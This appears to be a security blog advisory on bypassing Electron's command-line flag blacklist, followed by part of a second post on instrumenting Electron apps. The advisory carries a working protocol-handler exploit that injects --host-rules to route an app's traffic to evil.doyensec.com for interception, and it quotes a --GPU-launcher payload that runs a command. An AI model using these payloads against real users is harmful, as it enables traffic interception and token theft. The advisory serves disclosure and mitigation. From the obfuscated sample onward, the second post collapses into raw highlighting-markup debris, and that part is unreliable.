```cpp
bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}
```

As is commonly seen, blacklist-based validation is prone to errors and omissions, especially in complex execution environments like Electron:

- The patch relies on a static blacklist of available Chromium flags (https://peter.sh/experiments/chromium-command-line-switches/). On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/V8
- The blacklist is implemented using a binary search. Valid flags could be missed by the check if they're not properly sorted

### Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform a completely transparent Man-In-The-Middle:

```html
<!doctype html>
<script>
window.location = 'skype://user?userinfo --host-rules=MAP * evil.doyensec.com --foobar='
</script>
```

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help, as demonstrated in the following video:

[Video: skypeelectronbugpoc.mp4]

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. OAuth tokens), this issue can also be abused to inject malicious HTML responses containing XSS -> RCE payloads. With `nodeIntegration` enabled, this is simply achieved by leveraging Node's APIs. When encountering application sandboxing via `nodeIntegration: false` or `sandbox`, it is necessary to chain this with other bugs (e.g. a nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron's update feature, along with other critical functions, is not affected by this vulnerability.

### Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce the dash-dash notation in `setAsDefaultProtocolClient`:

```javascript
app.setAsDefaultProtocolClient(protocol, process.execPath, ['--your-switches-here', '--'])
```

or in the Windows protocol handler registry entry:

[Image: secure Windows protocol handler registry entry]

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers enforce numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. *When working with Electron, things get even more complicated.*

[email protected]

[email protected]
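What the blacklist check does and does not catch, as an added example that is neither Electron's code nor the post's: a JavaScript model of CheckCommandLineArguments() above and of Chromium's treatment of a bare `--`, run against the --host-rules PoC. The blacklist is an assumed, abbreviated subset of Electron's (it deliberately lacks host-rules, as the real one did at the time), IsUrlArg() is approximated by a scheme-prefix check, and the way Windows turns the registry command into argv is reduced to whitespace splitting; all of that is the example's assumption, not a description of the real code paths.

```javascript
'use strict';

// Added example, not Electron's code: a model of the post-CVE-2018-1000006
// CheckCommandLineArguments() check and of Chromium's "--" handling, run against
// the --host-rules PoC from the post. Assumptions are marked as such.

// Assumed, abbreviated subset of Electron's kBlacklist (kept sorted, as the real
// one must be). Like the real list at the time of the bypass, it lacks host-rules.
const kBlacklist = [
  'gpu-launcher',
  'inspect',
  'inspect-brk',
  'js-flags',
  'renderer-cmd-prefix',
  'utility-cmd-prefix',
];

// Switch name of an argument: leading dashes stripped, "=value" dropped, lower-cased
// (the January 31 follow-up patch was needed because "--GPU-launcher" slipped past a
// case-sensitive comparison).
function switchName(arg) {
  const m = /^--?([^=]+)/.exec(arg);
  return m ? m[1].toLowerCase() : null;
}

// Model of IsBlacklistedArg(): binary search over the sorted blacklist.
function isBlacklistedArg(arg) {
  const name = switchName(arg);
  if (name === null) return false;
  let lo = 0;
  let hi = kBlacklist.length - 1;
  while (lo <= hi) {
    const mid = (lo + hi) >> 1;
    if (kBlacklist[mid] === name) return true;
    if (kBlacklist[mid] < name) lo = mid + 1; else hi = mid - 1;
  }
  return false;
}

// Approximation of IsUrlArg(): a "scheme:" prefix and no leading dash (assumption).
function isUrlArg(arg) {
  return /^[a-z][a-z0-9+.-]*:/i.test(arg);
}

// Port of CheckCommandLineArguments(): after the first URL, any blacklisted switch
// rejects the command line; a bare "--" ends the scan.
function checkCommandLineArguments(argv) {
  let blockBlacklistedArgs = false;
  for (const arg of argv) {
    if (arg === '--') break;
    if (blockBlacklistedArgs) {
      if (isBlacklistedArg(arg)) return false;
    } else if (isUrlArg(arg)) {
      blockBlacklistedArgs = true;
    }
  }
  return true;
}

// Model of base::CommandLine: "--name[=value]" arguments before a bare "--" are
// switches (names are lower-cased on Windows); everything after "--" is a plain
// argument and is never interpreted as a switch, whatever it looks like.
function parseSwitches(argv) {
  const switches = {};
  for (const arg of argv.slice(1)) {   // argv[0] is the program
    if (arg === '--') break;
    const m = /^--?([^=]+)(?:=(.*))?$/.exec(arg);
    if (m) switches[m[1].toLowerCase()] = m[2] === undefined ? '' : m[2];
  }
  return switches;
}

// Simplified model (assumption) of how a registry command such as `app.exe %1`
// becomes argv when the browser hands over the protocol URL: %1 is substituted and
// the spaces inside the URL split it into several arguments, as the post describes.
function buildArgv(registryTemplate, url) {
  return registryTemplate.replace('%1', url).split(/\s+/).filter(Boolean);
}

const HOST_RULES_POC = 'skype://user?userinfo --host-rules=MAP * evil.doyensec.com --foobar=';
const GPU_LAUNCHER_POC = 'myapp://foobar --GPU-launcher=cmd c/ start calc --foobar=';

// Launch `url` through the handler registered as `registryTemplate` and report what
// the check decides and which switches Chromium would end up honouring.
function simulateLaunch(registryTemplate, url) {
  const argv = buildArgv(registryTemplate, url);
  return {
    argv,
    passesCheck: checkCommandLineArguments(argv),
    switches: parseSwitches(argv),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(simulateLaunch('app.exe %1', HOST_RULES_POC));    // check passes, host-rules honoured
  console.log(simulateLaunch('app.exe -- %1', HOST_RULES_POC)); // check passes, no switches at all
  console.log(simulateLaunch('app.exe %1', GPU_LAUNCHER_POC));  // check rejects the launch
}
```

The two runs against the same PoC make the point of the post concrete: the check is only as good as its list, and `--host-rules` sails through, whereas a `--` placed before `%1` in the registered command turns every following token into a plain argument for Chromium no matter what the list knows. The `setAsDefaultProtocolClient` call above produces exactly that layout.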

Instrumenting Electron Apps for Security Testing

18 July 2018 at 22:00
### Instrumenting Electron-based applications

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

### Electron and processes

The Electron Framework (https://electronjs.org/) is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json's main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers, where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower-level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial, since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron security, hardening and vulnerability prevention in the official Security Recommendations document (https://electronjs.org/docs/tutorial/security#checklist-security-recommendations).

### Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: `npm install -g asar`

and extract the whole archive: `asar extract core.asar destinationfolder`

At its simplest, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the "entry point" of our application:

```json
{
  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true
}
```

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every browserWindow instantiated in the main process.

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

`npm install`

We should also install Devtron (https://electronjs.org/devtron), a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, nodeIntegration must be on.

`npm install --save-dev devtron`

Then, run the following from the Console tab of the Developer Tools:

```javascript
require('devtron').install()
```

### Dealing with obfuscated JavaScript

Whenever the application is neither minified nor obfuscated, we can easily inspect the code.

```javascript
'use strict';

Object.defineProperty(exports, "__esModule", { value: true });
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;

function startup(bootstrapModules) {
  [--cut--]
```

In case of obfuscation, there are no silver bullets to unfold heavily manipulated JavaScript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

```javascript
eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\
```
class=s1x65/spanspan class=se\/spanspan class=s1x2b/spanspan class=se\/spanspan class=s1x68/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x7d/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x31/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x7b/spanspan class=se\/spanspan class=s1x79/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x7d/spanspan class=se\/spanspan class=s1x7d/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x7a/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x6b/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x2e/spanspan class=se\/spanspan class=s1x44/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x29/spanspan class=dl'/spanspan class=p,/spanspan class=mh0x28/spanspan class=p,/spanspan class=mh0x28/spanspan class=p,/spanspan class=dl'/spanspan class=se\/spanspan class=s1x7c/spanspan 
class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x30/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x30/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x46/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x31/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x66/spanspan class=se\/spanspan class=s1x75/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x31/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x76/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x43/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan 
class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x68/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x73/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x4e/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x77/spanspan class=se\/spanspan class=s1x4f/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x41/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x45/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan 
class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x38/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x44/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x44/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x75/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x77/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x45/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan 
class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x53/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x79/spanspan class=se\/spanspan class=s1x48/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x6f/spanspan class=dl'/spanspan class=p[/spanspan class=dl'/spanspan class=se\/spanspan class=s1x73/spanspan class=se\/spanspan class=s1x70/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x74/spanspan class=dl'/spanspan class=p](/spanspan class=dl'/spanspan class=se\/spanspan class=s1x7c/spanspan class=dl'/spanspan class=p)));/span /code/pre/div/div pIt can be manually turned into:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nbeval/spanspan class=p(/spanspan class=kdfunction/span span class=p(/spanspan class=nxc/spanspan class=p,/span span class=nxd/spanspan class=p,/span span class=nxe/spanspan class=p,/span span class=nxf/spanspan class=p,/span span class=nxg/spanspan class=p,/span span class=nxh/spanspan class=p)/span span class=p{/span span class=nxg/span span class=o=/span span class=kdfunction/span span class=p(/spanspan class=nxi/spanspan class=p)/span span class=p{/span span class=kreturn/span span class=p(/spanspan class=nxi/span span class=olt;/span span class=nxd/span span class=p?/span span class=dl''/span span class=p:/span span class=nxg/spanspan class=p(/spanspan class=nbparseInt/spanspan class=p(/spanspan class=nxi/span span class=o//span span class=nxd/spanspan class=p)))/span span class=o+/span span class=p((/spanspan class=nxi/span span class=o=/span span class=nxi/span span 
class=o%/span span class=nxd/spanspan class=p)/span span class=ogt;/span span class=mi35/span span class=p?/span span class=nbString/spanspan class=p[/spanspan class=dl'/spanspan class=s1fromCharCode/spanspan class=dl'/spanspan class=p](/spanspan class=nxi/span span class=o+/span span class=mi29/spanspan class=p)/span span class=p:/span span class=nxi/spanspan class=p[/spanspan class=dl'/spanspan class=s1toString/spanspan class=dl'/spanspan class=p](/spanspan class=mi36/spanspan class=p));/span span class=p};/span span class=kwhile/span span class=p(/spanspan class=nxe/spanspan class=o--/spanspan class=p)/span span class=p{/span span class=kif/span span class=p(/spanspan class=nxf/spanspan class=p[/spanspan class=nxe/spanspan class=p])/span span class=p{/span span class=nxc/span span class=o=/span span class=nxc/spanspan class=p[/spanspan class=dl'/spanspan class=s1replace/spanspan class=dl'/spanspan class=p](/spanspan class=knew/span span class=nbRegExp/spanspan class=p(/spanspan class=dl'/spanspan class=se\\/spanspan class=s1b/spanspan class=dl'/span span class=o+/span span class=nxg/spanspan class=p(/spanspan class=nxe/spanspan class=p)/span span class=o+/span span class=dl'/spanspan class=se\\/spanspan class=s1b/spanspan class=dl'/spanspan class=p,/span span class=dl'/spanspan class=s1g/spanspan class=dl'/spanspan class=p),/span span class=nxf/spanspan class=p[/spanspan class=nxe/spanspan class=p]);/span span class=p}/span span class=p}/span span class=kreturn/span span class=nxc/spanspan class=p;/span span class=p}(/spanspan class=dl'/spanspan class=s1b 5=[/spanspan class=se\\/spanspan class=s1o/spanspan class=se\\/spanspan class=s18/spanspan class=se\\/spanspan class=s1p/spanspan class=se\\/spanspan class=s1s/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1c/spanspan class=se\\/spanspan class=s1c/spanspan class=se\\/spanspan class=s17,/spanspan class=se\\/spanspan class=s1r/spanspan class=se\\/spanspan class=s14/spanspan 
class=se\\/spanspan class=s1d/spanspan class=se\\/spanspan class=s1t/spanspan class=se\\/spanspan class=s17/spanspan class=se\\/spanspan class=s1g/spanspan class=se\\/spanspan class=s1m/spanspan class=se\\/spanspan class=s1d,/spanspan class=se\\/spanspan class=s1u/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1f/spanspan class=se\\/spanspan class=s1f/spanspan class=se\\/spanspan class=s18/spanspan class=se\\/spanspan class=s1q/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s16/spanspan class=se\\/spanspan class=s1l/spanspan class=se\\/spanspan class=s16,/spanspan class=se\\/spanspan class=s1n/spanspan class=se\\/spanspan class=s17/spanspan class=se\\/spanspan class=s1g/spanspan class=se\\/spanspan class=s16/spanspan class=se\\/spanspan class=s18/spanspan class=se\\/spanspan class=s1w/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s16/spanspan class=se\\/spanspan class=s1B/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1c/spanspan class=se\\/spanspan class=s1C/spanspan class=se\\/spanspan class=s17/spanspan class=se\\/spanspan class=s1v/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1A];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])/spanspan class=dl'/spanspan class=p,/span span class=mi40/spanspan class=p,/span span class=mi40/spanspan class=p,/span span class=dl'/spanspan class=s1||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello/spanspan class=dl'/spanspan class=p[/spanspan class=dl'/spanspan class=s1split/spanspan class=dl'/spanspan class=p](/spanspan class=dl'/spanspan class=s1|/spanspan class=dl'/spanspan class=p)));/span /code/pre/div/div pThen, it can be passed to a href=https://mindedsecurity.github.io/jstillery/JStillery/a, a href=http://jsnice.org/JS Nice/a and other similar 
tools in order to get back a human readable version./p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=dl'/spanspan class=s1use strict/spanspan class=dl'/spanspan class=p;/span span class=kdvar/span span class=nx_0/span span class=o=/span span class=p[/spanspan class=dl/spanspan class=s2SayHello/spanspan class=dl/spanspan class=p,/span span class=dl/spanspan class=s2GetCount/spanspan class=dl/spanspan class=p,/span span class=dl/spanspan class=s2Message : /spanspan class=dl/spanspan class=p,/span span class=dl/spanspan class=s2You are welcome./spanspan class=dl/spanspan class=p];/span span class=kdfunction/span span class=nxNewObject/spanspan class=p(/spanspan class=nxcontentsOfMyTextFile/spanspan class=p)/span span class=p{/span span class=kdvar/span span class=nx_1/span span class=o=/span span class=mi0/spanspan class=p;/span span class=kthis/spanspan class=p[/spanspan class=nx_0/spanspan class=p[/spanspan class=mi0/spanspan class=p]]/span span class=o=/span span class=kdfunction/spanspan class=p(/spanspan class=nxtheLibrary/spanspan class=p)/span span class=p{/span span class=nx_1/spanspan class=o++/spanspan class=p;/span span class=nxalert/spanspan class=p(/spanspan class=nxcontentsOfMyTextFile/span span class=o+/span span class=nxtheLibrary/spanspan class=p);/span span class=p};/span span class=kthis/spanspan class=p[/spanspan class=nx_0/spanspan class=p[/spanspan class=mi1/spanspan class=p]]/span span class=o=/span span class=kdfunction/spanspan class=p()/span span class=p{/span span class=kreturn/span span class=nx_1/spanspan class=p;/span span class=p};/span span class=p}/span span class=kdvar/span span class=nxobj/span span class=o=/span span class=knew/span span class=nxNewObject/spanspan class=p(/spanspan class=nx_0/spanspan class=p[/spanspan class=mi2/spanspan class=p]);/span span class=nxobj/spanspan class=p./spanspan class=nxSayHello/spanspan class=p(/spanspan class=nx_0/spanspan class=p[/spanspan 
class=mi3/spanspan class=p]);/span /code/pre/div/div h3 id=enabling-the-developer-tools-in-the-renderer-processEnabling the developer tools in the renderer process/h3 pDuring testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and code class=language-plaintext highlighter-rougelt;webviewgt;/code tags./p pElectron’s Main process can use the a href=https://electronjs.org/docs/api/browser-windowBrowserWindow API/a to call the emBrowserWindow/em method and instantiate a new renderer./p pIn the example below, we are creating a new emBrowserWindow/em instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:/p pem/app/mainScreen.js/em/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdvar/span span class=nxwinOptions/span span class=o=/span span class=p{/span span class=natitle/spanspan class=p:/span span class=dl'/spanspan class=s1Example App/spanspan class=dl'/spanspan class=p,/span span class=nabackgroundColor/spanspan class=p:/span span class=dl'/spanspan class=s1#ffffff/spanspan class=dl'/spanspan class=p,/span span class=nawidth/spanspan class=p:/span span class=nxDEFAULT_WIDTH/spanspan class=p,/span span class=naheight/spanspan class=p:/span span class=nxDEFAULT_HEIGHT/spanspan class=p,/span span class=naminWidth/spanspan class=p:/span span class=nxMIN_WIDTH/spanspan class=p,/span span class=naminHeight/spanspan class=p:/span span class=nxMIN_HEIGHT/spanspan class=p,/span span class=natransparent/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=naframe/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=naresizable/spanspan class=p:/span span class=kctrue/spanspan class=p,/span span class=nashow/spanspan class=p:/span span 
class=nxisVisible/spanspan class=p,/span span class=nawebPreferences/spanspan class=p:/span span class=p{/span span class=nanodeIntegration/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=napreload/spanspan class=p:/span span class=nx_path2/spanspan class=p./spanspan class=kdefault/spanspan class=p./spanspan class=nxjoin/spanspan class=p(/spanspan class=nx__dirname/spanspan class=p,/span span class=dl'/spanspan class=s1preload.js/spanspan class=dl'/spanspan class=p)/span span class=p}/span span class=p};/span span class=p[/span span class=o--/span span class=nxcut/span span class=o--/span span class=p]/span span class=nxmainWindow/span span class=o=/span span class=knew/span span class=nx_electron/spanspan class=p./spanspan class=nxBrowserWindow/spanspan class=p(/spanspan class=nxwinOptions/spanspan class=p);/span span class=nxwinId/span span class=o=/span span class=nxwin/spanspan class=p./spanspan class=nxid/spanspan class=p;/span span class=c1//|--gt; HERE we can hook and add the Developers Tools lt;--|/span span class=nxwin/spanspan class=p./spanspan class=nxwebContents/spanspan class=p./spanspan class=nxopenDevTools/spanspan class=p({/span span class=namode/spanspan class=p:/span span class=dl'/spanspan class=s1bottom/spanspan class=dl'/span span class=p})/span span class=nxwin/spanspan class=p./spanspan class=nxsetMenuBarVisibility/spanspan class=p(/spanspan class=kctrue/spanspan class=p);/span /code/pre/div/div pIf everything worked fine, we should have the Developers Tools enabled for the main UI screen./p pFrom the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. 
